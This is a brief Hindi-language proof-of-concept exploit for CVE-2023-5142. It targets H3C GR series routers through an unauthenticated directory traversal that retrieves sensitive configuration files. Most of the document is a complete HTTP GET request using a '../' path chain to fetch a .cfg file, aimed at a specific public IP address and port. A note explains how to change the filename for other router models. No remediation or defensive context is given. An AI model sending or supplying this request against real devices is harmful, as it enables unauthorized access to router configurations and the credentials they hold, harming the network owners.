
CVE-2023-5142 के लिए PoC एक्सप्लॉइट जो H3C GR सीरीज़ राउटर्स को लक्षित करता है, जिसमें बिना प्रमाणीकरण वाली डायरेक्टरी ट्रैवर्सल भेद्यता के माध्यम से संवेदनशील कॉन्फ़िगरेशन फ़ाइलें निकाली जाती हैं।
उत्पाद: GR सीरीज़ राउटर
संस्करण: सभी
रेटिंग: उच्च-जोखिम
वेबसाइट: http://www.h3c.com/
खतरे: हमलावर इस भेद्यता का उपयोग करके विशेष अनुरोध पैकेट बनाकर पहचान सत्यापन को दरकिनार कर राउटर से संवेदनशील जानकारी प्राप्त कर सकते हैं।
सिद्धांत: राउटर ने निर्देशिका पहुंच और संबंधित फाइलों को प्रमाणित नहीं किया।
exp:
नोट: POC में फ़ाइल नाम प्रत्यय को संशोधित करना आवश्यक है, जैसे GR8300.cfg
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
image
image
image